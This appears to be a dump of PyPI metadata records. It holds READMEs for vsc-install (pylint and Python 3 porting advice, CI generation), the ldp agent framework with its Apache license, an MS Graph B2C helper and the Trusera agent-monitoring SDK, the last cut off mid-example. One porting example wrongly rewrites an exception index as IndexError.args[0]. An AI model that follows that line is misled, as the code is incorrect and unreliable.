program will be in a weird state and then continue on, whilst the person who just pressed ctrl+c is wondering what is going on and why it is not stopping. so at the very least make this except Exception (which doesn't catch sys.exit and KeyboardInterupt) and it would be appreciated if you could actually figure out what exceptions to expect and only catch those and let your program crash if something you did not intend happens because it helps developers catch weird errors on their side better. if you do something like ```python try: Path(int(somestring)).write_text('important data') except Exception: pass # if somestring is not an integer, we didn't need to write anyway, but otherwise we do ``` because you know sometimes this string does not contain an integer, so the int() call can fail you should really only catch ValueError, because this will also fail when your disk is full, or you don't have permissions or xxx other reasons, and the important data will not be written out and nobody will notice anything! if not 'a' in somelist -> if 'a' not in somelist ------------------------------------------------- this isn't that big of a deal, but if everyone is consistent it's less likely to introduce bugs when a not is added or removed where it didn't need to. Also helps code review, not in reads better, like english. arguments-differ ----------------- this will give you errors if you override a function of a superclass but don't use the same amount of arguments, using less will surely give you errors, so the linter catches this for you now unused-argument ----------------- if you have a function definition witch accepts an argument that is never used in the function body this will now give an error. clean up your function definition, or fix the error where you actually do need to take this argument into account unused-variable ---------------- defining a variable and then not using it anymore smells bad, why did you do that? sometimes you do things like ```python out, exit_code = run_command(something) ``` but you are not interested in the out, only in the exit code, in this case, write ```python _, exit_code = run_command(something) ``` using _ as a variable name lets pylint and other readers know you do not intend to use that output in the first place. reimported ------------- when you re import a name somewhere else, usually this is just an import to much, or 2 imports with the same name, pay attention. ```python import six from django import six ``` => ```python import six from django import six as django_six ``` redefinition of unused name ---------------------------- this usually also points to something you did not expect ```python from vsc.accountpageclient import VscGroup <snip> class VscGroup(object): pass ``` => do you need the import? use import as did you mean to use the same name? ... Redefined builtin ----------------- use different name, for example change ```python def filter(b_b): """Function filter""" return b_b ``` => ```python def new_filter(b_b): """Function filter""" return b_b ``` logging-not-lazy ---------------- Don't use string interpolation when logging if not needed: ```python import logging name = 'world' program ='python' logging.info('Hello %s! This is %s.' % (name, program)) ``` => ```python import logging name = 'world' program ='python' logging.info('Hello %s! This is %s.', name, program) ``` Fix Python 3 failing tests ========================== * We try to follow https://docs.python.org/3/howto/pyporting.html * some useful info can be found here as well https://portingguide.readthedocs.io/en/latest/index.html unpacking-in-except / redefine-in-handler ----------------------------------------- Multiple exception have to be grouped in a tuple like ```python ... except (ExceptionOne, ExceptionTwo) ... ... ``` (espcially when used like `except A, B:` which should be `except (A, B):`. Old raise syntax ---------------- Python 2’s **raise** statement was designed at a time when exceptions weren’t classes, and an exception’s _type_, _value_, and _traceback_ components were three separate objects. In Python 3, one single object includes all information about an exception. ```python raise NameError, "Error" ``` => ```python raise NameError("Error") ``` or change ```python raise NameError, "Error", some_traceback ``` => ```python raise NameError("Error") e = NameError("Error") e.__traceback__ = some_traceback ``` backtick -------- ```python A = 2 B = `A` ``` => ```python A = 2 B = str(A) ``` Old ne operator --------------- ```python if 2 <> 3: ``` => ```python if 2 != 3: ``` Octal literal ------------- ```python os.chmod(foo, 0700) ``` => ```python os.chmod(foo, 0o700) ``` Import star module level ------------------------ Do not import \*, be more specific. If it is impossible, import it in the top level (and suppress the pyflakes error F403.) ```python def coords(angle, distance): """Function coords""" from math import * return distance * cos(angle), distance * sin(angle) ``` => ```python from math import * # noqa: F403 def coords(angle, distance): """Function coords""" return distance * cos(angle), distance * sin(angle) ``` Raising string -------------- ```python raise ValueError, 'message' ``` => ```python raise ValueError('message') ``` Indexing exception ------------------ ```python except IndexError as err: err[0] ``` => ```python except IndexError as err: IndexError.args[0] ``` turning off these errors ------------------------- If in any of these cases you think: yes, I really needed to do this, I'm monkeypatching things, I'm adding extra functionality that does indeed have an extra(default) paramenter, etc, etc you can let pylint know to ignore this error in this one specific block of code by adding e.g. the comment `# pylint: disable=<name or numeric id of pylint code>` ```python class Something(object): def dosomething(self, some, thing): # do something class MyFancyThing(SomeThing): # pylint: disable=arguments-differ def dosomething(self, some, thing, fancy=None): # do something fancy ``` Full list with all codes is available at http://pylint-messages.wikidot.com/all-codes Auto-generated `Jenkinsfile` / `tox.ini` ======================================== `vsc-install` has support for auto-generating the `Jenkinsfile` (and accompanying `tox.ini`), via: python -m vsc.install.ci Failing check on (contents of) `Jenkinsfile` or `tox.ini` --------------------------------------------------------- There are dedicated tests that check whether the `Jenkinsfile` and `tox.ini` files were auto-generated by `vsc-install`. To fix the tests, simply run `python -m vsc.install.ci` using the latest version of `vsc-install` to re-generate `Jenkinsfile` and `tox.ini`, and then commit & push the changes. If the contents of the file that is auto-generated by the latest version of `vsc-install` is incorrect for whatever reason, you can temporarily bypass the failing test by adding an a file named `Jenkinsfile.NOT_AUTOGENERATED_YET` or `tox.ini.NOT_AUTOGENERATED_YET`. The file **must** contain the URL of a vsc-install issue, created via via https://github.com/hpcugent/vsc-install/issues/new, where the incorrectly generated file is reported. Example: echo "see https://github.com/hpcugent/vsc-install/issues/1234 for more info" > Jenkinsfile.NOT_AUTOGENERATED_YET Requiring JIRA issue ref in PR title ------------------------------------ To also include a check in the `Jenkinsfile` for having a JIRA issue ref (like `[HPC-1234]`) in the pull request title, add a configuration file for `python -m vsc.install.ci` named `vsc-ci.ini` like this into the repository: ```ini [vsc-ci] jira_issue_id_in_pr_title=1 ``` Running shellcheck ------------------ To also run `shellcheck` in the generated `Jenkinsfile`, specify this via a `vsc-ci.ini` configuration file: ```ini [vsc-ci] run_shellcheck=1 ``` Adding additional test commands to Jenkinsfile ---------------------------------------------- If additional custom test commands (other than `shellcheck`) need to be run by the `Jenkinsfile`, you can speicfy this in `vsc-ci.ini` via `additional_test_commands`. To add a single custom test command: ```ini [vsc-ci] additional_test_commands=./more_test.sh ``` To add multiple test commands: ```ini [vsc-ci] additional_test_commands= first-test-cmd second-test-cmd third-test-cmd ``` Overriding install location of scripts -------------------------------------- In some repositories we specify a system-wide install location for scripts via `setup.cfg` (see for example the `icinga-checks` repository), which causes problems when installing `vsc-install` in the tox environment. To override the installation prefix for scripts (only in the tox environment where the tests are run), specify this via a `vsc-ci.ini` configuration file: ```ini [vsc-ci] install_scripts_prefix_override=1 ``` Use 'easy_install' to install tox --------------------------------- For legacy reasons easy_install is still supported. If you still need it you can enable it (not recommended): ```ini [vsc-ci] easy_install_tox=1 ``` Avoid running ``pip install`` in repo checkout ---------------------------------------------- For some repositories, running ``pip install`` to install ``tox`` from the checked out repository is problematic, because of the ``setup.cfg`` containing things that should not be picked up by ``pip``. For those repositories, you can specify that the installation commands in the ``Jenkinsfile`` should be run from ``$HOME``, via: ```ini [vsc-ci] home_install=1 ``` Leveraging system (Python) packages ----------------------------------- If a repository requires Python packages as dependencies that are installed as OS packages (for example, ``pyslurm``), tox must be configured to inherit these packages in the test environment. This can be enabled via: ```ini [vsc-ci] inherit_site_packages=1 ``` Pre-installing dependencies before running tests ------------------------------------------------ Although ``vsc-install`` will automatically install all dependencies listed in ``setup.py`` prior to running the tests, there are cases where this doesn't work out as expected. Some Python packages only support being installed with ``pip install`` (for example because they use a namespace that is spread across multiple different Python packages, like ``fs`` and ``fs.sshfs``). You can specify Python packages that should be installed (with ``pip install``) before running the tests via ``pip_install_test_deps`` in ``vsc-ci.ini``: ```ini [vsc-ci] pip_install_test_deps= foo bar<1.0 ``` This results in corresponding ``pip install`` commands being added to the ``commands_pre`` section in ``tox.ini``: ```ini [testenv] commands_pre = pip install 'foo' pip install 'bar<1.0' pip install 'setuptools<42.0' python -m easy_install -U vsc-install ```
text/markdown
Stijn De Weirdt;Andy Georges;Jens Timmerman
stijn.deweirdt@ugent.be, andy.georges@ugent.be, jens.timmerman@ugent.be
Stijn De Weirdt;Andy Georges;Jens Timmerman
stijn.deweirdt@ugent.be, andy.georges@ugent.be, jens.timmerman@ugent.be
LGPLv2+
null
[ "License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)" ]
[]
https://github.com/hpcugent/vsc-install
null
null
[]
[]
[]
[]
[]
[]
[]
[]
twine/6.2.0 CPython/3.9.18
2026-02-19T22:19:39.570466
vsc_install-0.24.0.tar.gz
85,034
8e/80/2122f7eda5e1d71480c37b79f87b1fb3f2473c22fd3deaebda435000e7a0/vsc_install-0.24.0.tar.gz
source
sdist
null
false
365668c822d68b77c02884e1f4c415c6
8425fa625e6ce244ab971a0b0253550724fe3aff9523b0de71402c8fb911f6a5
8e802122f7eda5e1d71480c37b79f87b1fb3f2473c22fd3deaebda435000e7a0
null
[]
264
2.4
ldp
0.44.0
Agent framework for constructing language model agents and training on constructive tasks.
# Language Decision Processes (LDP) <!-- pyml disable-num-lines 10 line-length --> [![GitHub](https://img.shields.io/badge/github-%23121011.svg?style=for-the-badge&logo=github&logoColor=white)](https://github.com/Future-House/ldp) [![Project Status: Active](https://www.repostatus.org/badges/latest/active.svg)](https://www.repostatus.org/#active) ![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg) [![Docs](https://assets.readthedocs.org/static/projects/badges/passing-flat.svg)](https://futurehouse.gitbook.io/futurehouse-cookbook/ldp-language-decision-processes) [![PyPI version](https://badge.fury.io/py/ldp.svg)](https://badge.fury.io/py/ldp) [![tests](https://github.com/Future-House/ldp/actions/workflows/tests.yml/badge.svg)](https://github.com/Future-House/ldp) [![CodeFactor](https://www.codefactor.io/repository/github/future-house/ldp/badge)](https://www.codefactor.io/repository/github/future-house/ldp) [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) [![python](https://img.shields.io/badge/python-3.11%20%7C%203.12%20%7C%203.13-blue?style=flat&logo=python&logoColor=white)](https://www.python.org) <p align="center"> <a href="https://arxiv.org/abs/2412.21154"> <img src="docs/assets/ldp_chessboard.png" width="300" alt="row playing chess" /> </a> </p> **LDP** [^1] is a framework for enabling modular interchange of language agents, environments, and optimizers. A language decision process (LDP) is a partially-observable Markov decision process (POMDP) where actions and observations consist of natural language. The full definition from the Aviary paper [^1] is: <p align="left"> <a href="https://arxiv.org/abs/2412.21154"> <img src="docs/assets/ldp_definition.png" width="600" alt="LDP definition from paper" /> </a> </p> See the following [tutorial](https://github.com/Future-House/ldp/blob/main/tutorials/creating_a_language_agent.ipynb) for an example of how to run an LDP agent. [Overview](#overview) | [Getting Started](#getting-started) | [Documentation](https://futurehouse.gitbook.io/futurehouse-cookbook/ldp-language-decision-processes) | [Paper](https://arxiv.org/abs/2412.21154) ## What's New? - Check out our new [Tutorial](https://github.com/Future-House/ldp/blob/main/tutorials/creating_a_language_agent.ipynb) notebook on running an LDP agent in an Aviary environment! - The Aviary paper has been posted to [arXiv](https://arxiv.org/abs/2412.21154)! Further updates forthcoming! ## Overview <p align="left"> <a href="https://arxiv.org/abs/2412.21154"> <img src="docs/assets/Aviary.png" width="800" alt="Aviary and LDP overview from paper" /> </a> </p> A pictorial overview of the language decision process (LDP) framework together with five implemented Aviary environments. ## Getting Started To install `ldp`: ```bash pip install -e . ``` To install `aviary` and the `nn` (neural network) module required for the tutorials: ```bash pip install "ldp[nn]" "fhaviary[gsm8k]" ``` If you plan to export Graphviz visualizations, the `graphviz` library is required: - Linux: `apt install graphviz` - macOS: `brew install graphviz` ## Tutorial Notebooks 1. [Creating a Simple Language Agent][1] 2. [Evaluating a Llama Agent on GSM8K][2] [1]: https://github.com/Future-House/ldp/blob/main/tutorials/creating_a_language_agent.ipynb [2]: https://github.com/Future-House/ldp/blob/main/tutorials/evaluating_a_llama_agent.ipynb ## Running an Agent on an Aviary Environment The minimal example below illustrates how to run a language agent on an Aviary environment (LDP's sister library for defining language agent environments - <https://github.com/Future-House/aviary>) ```py from ldp.agent import SimpleAgent from aviary.core import DummyEnv env = DummyEnv() agent = SimpleAgent() obs, tools = await env.reset() agent_state = await agent.init_state(tools=tools) done = False while not done: action, agent_state, _ = await agent.get_asv(agent_state, obs) obs, reward, done, truncated = await env.step(action.value) ``` Below we elaborate on the components of LDP. ## Agent An agent is a language agent that interacts with an environment to accomplish a task. Agents may use tools (calls to external APIs e.g. Wolfram Alpha) in response to observations returned by the environment. Below we define LDP's `SimpleAgent` which relies on a single LLM call. The main bookkeeping involves appending messages received from the environment and passing tools. ```py from ldp.agent import Agent from ldp.graph import LLMCallOp class AgentState: def __init__(self, messages, tools): self.messages = messages self.tools = tools class SimpleAgent(Agent): def __init__(self, **kwargs): super().__init__(**kwargs) self.llm_call_op = LLMCallOp() async def init_state(self, tools): return AgentState([], tools) async def get_asv(self, agent_state, obs): action = await self.llm_call_op( config={"name": "gpt-4o", "temperature": 0.1}, msgs=agent_state.messages + obs, tools=agent_state.tools, ) new_state = AgentState( messages=agent_state.messages + obs + [action], tools=agent_state.tools ) return action, new_state, 0.0 ``` An agent has two methods: ```py agent_state = await agent.init_state(tools=tools) new_action, new_agent_state, value = await agent.get_asv(agent_state, obs) ``` - The `get_asv(agent_state, obs)` method chooses an action (`a`) conditioned on the observation messages returning the next agent state (`s`) and a value estimate (`v`). - The first argument, `agent_state`, is an optional container for environment-specific objects such as e.g. documents for PaperQA or lookup results for HotpotQA, - as well as more general objects such as memories which could include a list of previous actions and observations. `agent_state` may be set to `None` if memories are not being used. - The second argument `obs` is not the complete list of all prior observations, but rather the returned value from `env.step`. - The `value` is the agent's state/action value estimate used for reinforcment learning training. It may default to 0. ## A plain python agent Want to just run python code? No problem - here's a minimal example of an Agent that is deterministic: ```py from aviary.core import Message, Tool, ToolCall, ToolRequestMessage from ldp.agent import Agent class NoThinkAgent(Agent): async def init_state(self, tools): return None async def get_asv(self, tools, obs): tool_call = ToolCall.from_name("specific_tool_call", arg1="foo") action = ToolRequestMessage(tool_calls=[tool_call]) return await Agent.wrap_action(action), None, 0.0 ``` This agent has a state of `None`, just makes one specific tool call with `arg1="foo"`, and then converts that into an action. The only "magic" line of code is the `wrap_action`, which just converts the action constructed by plain python into a node in a compute graph - see more below. ## Stochastic Computation Graph (SCG) For more advanced use-cases, LDP features a stochastic computation graph [^2] which enables differentiatiation with respect to agent parameters (including the weights of the LLM). You should install the `scg` subpackage to work with it: ```bash pip install ldp[scg] ``` The example computation graph below illustrates the functionality ```py from ldp.graph import FxnOp, LLMCallOp, PromptOp, compute_graph op_a = FxnOp(lambda x: 2 * x) async with compute_graph(): op_result = op_a(3) ``` The code cell above creates and executes a computation graph that doubles the input. The computation graph gradients and executions are saved in a context for later use, such as in training updates. For example: ```py print(op_result.compute_grads()) ``` A more complex example is given below for an agent that possesses memory. ```py @compute_graph() async def get_asv(self, agent_state, obs): # Update state with new observations next_state = agent_state.get_next_state(obs) # Retrieve relevant memories query = await self._query_factory_op(next_state.messages) memories = await self._memory_op(query, matches=self.num_memories) # Format memories and package messages formatted_memories = await self._format_memory_op(self.memory_prompt, memories) memory_prompt = await self._prompt_op(memories=formatted_memories) packaged_messages = await self._package_op( next_state.messages, memory_prompt=memory_prompt, use_memories=bool(memories) ) # Make LLM call and update state config = await self._config_op() result = await self._llm_call_op( config, msgs=packaged_messages, tools=next_state.tools ) next_state.messages.extend([result]) return result, next_state, 0.0 ``` We use differentiable ops to ensure there is an edge in the compute graph from the LLM result (action) to components such as memory retrieval as well as the query used to retrieve the memory. Why use an SCG? Aside from the ability to take gradients, using the SCG enables tracking of all inputs/outputs to the ops and serialization/deserialization of the SCG such that it can be easily saved and loaded. Input/output tracking also makes it easier to perform fine-tuning or reinforcement learning on the underlying LLMs. ## Generic Support The `Agent` (as well as classes in `agent.ops`) are [generics](https://en.wikipedia.org/wiki/Generic_programming), which means: - `Agent` is designed to support arbitrary types - Subclasses can precisely specify state types, making the code more readable If you are new to Python generics (`typing.Generic`), please read about them in [Python `typing`](https://docs.python.org/3/library/typing.html#generics). Below is how to specify an agent with a custom state type. ```py from dataclasses import dataclass, field from datetime import datetime from ldp.agents import Agent @dataclass class MyComplexState: vector: list[float] timestamp: datetime = field(default_factory=datetime.now) class MyAgent(Agent[MyComplexState]): """Some agent who is now type checked to match the custom state.""" ``` ## References [^1]: Narayanan, S., Braza, J.D., Griffiths, R.R., Ponnapati, M., Bou, A., Laurent, J., Kabeli, O., Wellawatte, G., Cox, S., Rodriques, S.G. and White, A.D., 2024. [Aviary: training language agents on challenging scientific tasks.](https://arxiv.org/abs/2412.21154) arXiv preprint arXiv:2412.21154. [^2]: Schulman, J., Heess, N., Weber, T. and Abbeel, P., 2015. [Gradient estimation using stochastic computation graphs.](https://proceedings.neurips.cc/paper_files/paper/2015/hash/de03beffeed9da5f3639a621bcab5dd4-Abstract.html) Advances in Neural Information Processing Systems, 28.
text/markdown
null
FutureHouse technical staff <hello@futurehouse.org>
null
null
Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright 2025 FutureHouse Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[ "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "P...
[]
null
null
>=3.11
[]
[]
[]
[ "aiofiles", "fhaviary>=0.32.0", "fhlmi", "httpx-aiohttp", "numpy>=1.20", "pydantic~=2.0", "tenacity", "tiktoken", "tqdm", "typing-extensions; python_version <= \"3.11\"", "fhaviary[xml]>=0.19; extra == \"dev\"", "fhlmi[dev]; extra == \"dev\"", "httpx; extra == \"dev\"", "ipython>=8; extra ...
[]
[]
[]
[ "issues, https://github.com/Future-House/ldp/issues", "repository, https://github.com/Future-House/ldp" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:19:37.824961
ldp-0.44.0.tar.gz
4,836,205
f0/e8/db68de582dc843548b5d776aff767a47c48188876fec9df8aa67130c14db/ldp-0.44.0.tar.gz
source
sdist
null
false
d3475643e30e05faf406bab6d6035ded
1d3fbdc346532ccf17219a8b1719747772dfe2f5572072aba14bab3287d0d6a8
f0e8db68de582dc843548b5d776aff767a47c48188876fec9df8aa67130c14db
null
[ "LICENSE" ]
822
2.4
eam-b2c-helper
0.1.44
A package to interact with ms graph /users functionality
# This package is used as to add data to cosmos db, which is required during onboarding of a client or adding a new vendor to the 8am system. B2CHelper: build_user_object(): This function is used to format the user object according to the MS AD schema. It takes the user_details object from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the formatted user object. The last 4 fields within the the user object are custom fields which use the extension_id to denote as such. get_token() This function is used to get the token from the MS AD B2C. It takes the client_id, client_secret, tenant_id, and the scope as parameters and returns the token. get_auth_header() This function is used to get the authorization header for the MS AD B2C. It uses the token string returned from the get_token() function and structures it into a Bearer token along with Content-Type header for ease of use. create_item() This function is used to add a new user to the MS AD b2C directory. It takes the user object and the auth_header as parameters and returns the response from the MS Graph API. update_item() This function is used to update a user in the MS AD B2C directory. It takes the user object and the auth_header as parameters and returns the response from the MS Graph API. delete_item() This function is used to delete a user from the MS AD B2C directory. It takes the user object and the auth_header as parameters and returns the response from the MS Graph API. get_user() This function is used to get a user from the MS AD B2C directory. It takes the user id as a parameter, removes the @odata.context field and returns the single user object. compile_entire_user_list() This function is used to get the entire list of users from the MS AD B2C directory. As a default, the MS Graph API returns 100 users per page, this function will use the @odata.nextLink field to get the next page of users until there are no more pages left. It returns a list of user objects, combined from each successive call made to the MS Graph API. This function uses the argument filter_extension to filter users by either company, user role, or nothing at all (return all users from the directory). get_users() This function is used to get a list of users from the MS AD B2C directory. It takes a company id and a user role as optional parameters and returns a list of user objects, possibly filtered by the company and user role. Based off of what parameters are passed, it will call the compile_entire_user_list() function with the appropriate filter_extension. The filter extension is added to the suffix of the MS Graph API call to filter the users. create_user() This function is used to create a new user in the MS AD B2C directory. It takes the user_details object from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the response from the MS Graph API. create_users() This function is used to create multiple users in the MS AD B2C directory. It takes a list of user_details objects from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the response from the MS Graph API. update_user() This function is used to update a user in the MS AD B2C directory. It takes the user_details object from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the response from the MS Graph API. update_users() This function is used to update multiple users in the MS AD B2C directory. It takes a list of user_details objects from the 8am Web App front end, along with extension_id and b2c_prefix (B2C parameters) and returns the response from the MS Graph API. delete_user() This function is used to delete a user from the MS AD B2C directory. It takes the user_id from the 8am Web App front end and returns the response from the MS Graph API. delete_users() This function is used to delete multiple users from the MS AD B2C directory. It takes a list of user_ids from the 8am Web App front end and returns the response from the MS Graph API.
text/markdown
null
Dave Gunn <daveg@8amsolutions.com>
null
null
null
null
[ "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python :: 3" ]
[]
null
null
>=3.8
[]
[]
[]
[]
[]
[]
[]
[]
twine/6.0.1 CPython/3.11.0
2026-02-19T22:18:55.947161
eam_b2c_helper-0.1.44.tar.gz
6,643
9e/16/3e59fe7e37d6a1db7afd56ddf62c77882fda5d29563c9ac14ba61c8d54e9/eam_b2c_helper-0.1.44.tar.gz
source
sdist
null
false
b63a52fdb08ad7477898348dbdfdbb54
81dddfff347f950be526e7c39d63da5e599b015878b6a9b3024bca031a1d4375
9e163e59fe7e37d6a1db7afd56ddf62c77882fda5d29563c9ac14ba61c8d54e9
null
[]
238
2.3
trusera-sdk
1.0.0
Python SDK for monitoring and intercepting AI agent actions with Trusera
# Trusera Python SDK [![PyPI version](https://badge.fury.io/py/trusera-sdk.svg)](https://badge.fury.io/py/trusera-sdk) [![Python versions](https://img.shields.io/pypi/pyversions/trusera-sdk.svg)](https://pypi.org/project/trusera-sdk/) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) Python SDK for monitoring **and intercepting** AI agent actions with [Trusera](https://trusera.dev). Track LLM invocations, tool calls, data access, and enforce Cedar security policies before actions execute. ## Installation ```bash pip install trusera-sdk ``` ### Optional Dependencies ```bash # Framework integrations pip install trusera-sdk[langchain] pip install trusera-sdk[crewai] pip install trusera-sdk[autogen] # LLM client wrappers pip install trusera-sdk[openai] pip install trusera-sdk[anthropic] # Everything pip install trusera-sdk[all] # Development tools pip install trusera-sdk[dev] ``` ## Quick Start: Passive Monitoring ```python from trusera_sdk import TruseraClient, Event, EventType client = TruseraClient(api_key="tsk_your_api_key") agent_id = client.register_agent(name="my-agent", framework="custom") client.track(Event( type=EventType.TOOL_CALL, name="web_search", payload={"query": "latest AI news"}, )) client.close() ``` ## Active Interception (v0.3.0+) The SDK now supports **active interception** - evaluating agent actions against Cedar policies *before* they execute. Use `intercept()` for a one-liner setup, or `TruseraInterceptor` for full control. ### `intercept()` - One-Liner Setup ```python import trusera_sdk client = trusera_sdk.TruseraClient(api_key="tsk_...") client.register_agent("my-agent", "custom") # Intercept all HTTP calls (requests, httpx, urllib3) interceptor = trusera_sdk.intercept(client, enforcement="block") # Your agent code runs normally - policy violations raise PolicyViolationError import requests requests.get("https://allowed-api.com/data") # OK requests.get("https://blocked-api.com/data") # Raises PolicyViolationError interceptor.uninstall() ``` ### `TruseraInterceptor` - Full Control ```python from trusera_sdk import TruseraClient, TruseraInterceptor from trusera_sdk.policy_cache import PolicyCache client = TruseraClient(api_key="tsk_...") cache = PolicyCache(client=client, refresh_interval=30) with TruseraInterceptor(client=client, policy_cache=cache, enforcement="warn") as i: # All outbound HTTP is evaluated against Cedar policies # Warn mode logs violations but allows requests to proceed pass ``` ### Enforcement Modes | Mode | Behavior | |------|----------| | `block` | Raise `PolicyViolationError` and prevent the action | | `warn` | Log a warning to stderr, allow the action | | `log` | Silently record the violation, allow the action | ## Using the Decorator ```python from trusera_sdk import TruseraClient, monitor, set_default_client, EventType client = TruseraClient(api_key="tsk_your_api_key") client.register_agent("my-agent", "custom") set_default_client(client) @monitor(event_type=EventType.TOOL_CALL) def search_database(query: str) -> 